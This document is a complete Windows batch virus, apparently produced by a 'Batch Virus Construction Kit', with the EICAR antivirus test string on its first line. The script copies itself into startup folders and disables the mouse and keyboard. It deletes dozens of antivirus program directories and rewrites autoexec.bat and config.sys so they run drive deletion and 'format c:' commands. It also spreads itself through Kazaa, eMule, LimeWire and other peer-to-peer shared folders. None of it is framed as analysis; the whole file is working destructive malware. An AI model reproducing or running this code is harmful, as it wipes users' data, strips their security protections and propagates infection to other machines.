X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
::
:: Generated by Batch Virus Construction Kit 0.5 [DvL]-[rRLF]
:: Created by DvL
::
@echo off
@ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\vrwoilyh.bat>nul
copy %0 %windir%\startm~1\programs\startup\vrwoilyh.bat>nul
rundll32 mouse,disable
rundll32 keyboard,disable
set olh=deltree/y c:\
%olh%antiba~1\>nul
%olh%antiba~2\>nul
%olh%antiba~1.1\>nul
%olh%antiba~1.2\>nul
%olh%antiba~1.3\>nul
%olh%antiba~1.4\>nul
%olh%antiba~1.5\>nul
%olh%antiba~1.6\>nul
%olh%antiba~1.7\>nul
%olh%antiba~1.8\>nul
%olh%antivi~1\>nul
%olh%antivi~2\>nul
%olh%antiviru\>nul
%olh%avg\>nul
%olh%avp\>nul
%olh%avp30\>nul
%olh%avx\>nul
%olh%avpers~1\>nul
%olh%bitdef~1\>nul
%olh%bitdef~2\>nul
%olh%comman~1\>nul
%olh%cleancih\>nul
%olh%esafen\>nul
%olh%findvi~1\>nul
%olh%f-macro\>nul
%olh%f-prot\>nul
%olh%f-prot95\>nul
%olh%f-secu~1\>nul
%olh%fwin\>nul
%olh%fwin32\>nul
%olh%inocul~1\>nul
%olh%inocul~2\>nul
%olh%kasper~1\>nul
%olh%kasper~2\>nul
%olh%mcafee\>nul
%olh%mcafee~1\>nul
%olh%msav\>nul
%olh%norman\>nul
%olh%norton~1\>nul
%olh%norton~2\>nul
%olh%pav\>nul
%olh%pccill~1\>nul
%olh%pc-cil~1\>nul
%olh%rav\>nul
%olh%softwin\>nul
%olh%tbav\>nul
%olh%tbavw95\>nul
%olh%toolkit\>nul
%olh%trendm~1\>nul
%olh%trex\>nul
%olh%virus\>nul
%olh%vpc\>nul
%olh%vs95\>nul
%olh%zonela~1\>nul
%olh%zonela~2\>nul
set olh=deltree/y c:\progra~1\
%olh%antiba~1\>nul
%olh%antiba~2\>nul
%olh%antiba~1.1\>nul
%olh%antiba~1.2\>nul
%olh%antiba~1.3\>nul
%olh%antiba~1.4\>nul
%olh%antiba~1.5\>nul
%olh%antiba~1.6\>nul
%olh%antiba~1.7\>nul
%olh%antiba~1.8\>nul
%olh%antivi~1\>nul
%olh%antivi~2\>nul
%olh%avg\>nul
%olh%avp\>nul
%olh%avx\>nul
%olh%avx2000\>nul
%olh%avpers~1\>nul
%olh%bitdef~1\>nul
%olh%bitdef~2\>nul
%olh%comman~1\>nul
%olh%common~1\avpsha~1\>nul
%olh%common~1\symant~1\>nul
%olh%datafe~1\>nul
%olh%deerfi~1.com\>nul
%olh%f-prot\>nul
%olh%f-prot95\>nul
%olh%findvi~1\>nul
%olh%f-secu~1\>nul
%olh%f-secure\>nul
%olh%fsi\>nul
%olh%fwin\>nul
%olh%fwin32\>nul
%olh%grisoft\>nul
%olh%inocul~1\>nul
%olh%inocul~2\>nul
%olh%intern~2\>nul
%olh%kasper~1\>nul
%olh%kasper~2\>nul
%olh%mcafee\>nul
%olh%mcafee~1\>nul
%olh%mindso~1\>nul
%olh%norman\>nul
%olh%norton~1\>nul
%olh%norton~2\>nul
%olh%pandas~1\>nul
%olh%protec~1\>nul
%olh%protec~2\>nul
%olh%quickh~1\>nul
%olh%rav\>nul
%olh%signal9\>nul
%olh%softwin\>nul
%olh%spysto~1\>nul
%olh%symant~1\>nul
%olh%tbav\>nul
%olh%tinype~1\>nul
%olh%trendm~1\>nul
%olh%trendp~1\>nul
%olh%trojan~1\>nul
%olh%trojan~2\>nul
%olh%virusm~1.0\>nul
%olh%zonela~1\>nul
%olh%zonela~2\>nul
set olh=
echo.time 00:00:00,00>>c:\autoexec.bat
echo.date 80-01-01>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat
echo.[menu]>c:\config.sys
echo.menuitem=w>>c:\config.sys
echo.>>c:\config.sys
echo.[w]>>c:\config.sys
echo.buffers=1>>c:\config.sys
echo.files=1>>c:\config.sys
echo.lastdrive=A>>c:\config.sys
echo.set path=deltree/y c:\>>c:\config.sys
echo.set temp=A:\>>c:\config.sys
echo.set windir=format c:/u/q/autotest>>c:\config.sys
copy %0 c:\kazaa\myshar~1\vrwoilyh.bat>nul
copy %0 c:\mydown~1\vrwoilyh.bat>nul
copy %0 c:\mydocu~1\vrwoilyh.bat>nul
copy %0 c:\eigene~1\vrwoilyh.bat>nul
copy %0 c:\progra~1\applej~1\incoming\vrwoilyh.bat>nul
copy %0 c:\progra~1\bearsh~1\shared\vrwoilyh.bat>nul
copy %0 c:\progra~1\edonke~1\incoming\vrwoilyh.bat>nul
copy %0 c:\progra~1\emule\incoming\vrwoilyh.bat>nul
copy %0 c:\progra~1\grokster\mygrok~1\vrwoilyh.bat>nul
copy %0 c:\progra~1\icq\shared~1\vrwoilyh.bat>nul
copy %0 c:\progra~1\kazaa\myshar~1\vrwoilyh.bat>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\vrwoilyh.bat>nul
copy %0 c:\progra~1\kmd\myshar~1\vrwoilyh.bat>nul
copy %0 c:\progra~1\limewire\shared\vrwoilyh.bat>nul
copy %0 c:\progra~1\morpheus\myshar~1\vrwoilyh.bat>nul
copy %0 c:\progra~1\overnet\bundles\vrwoilyh.bat>nul
cls
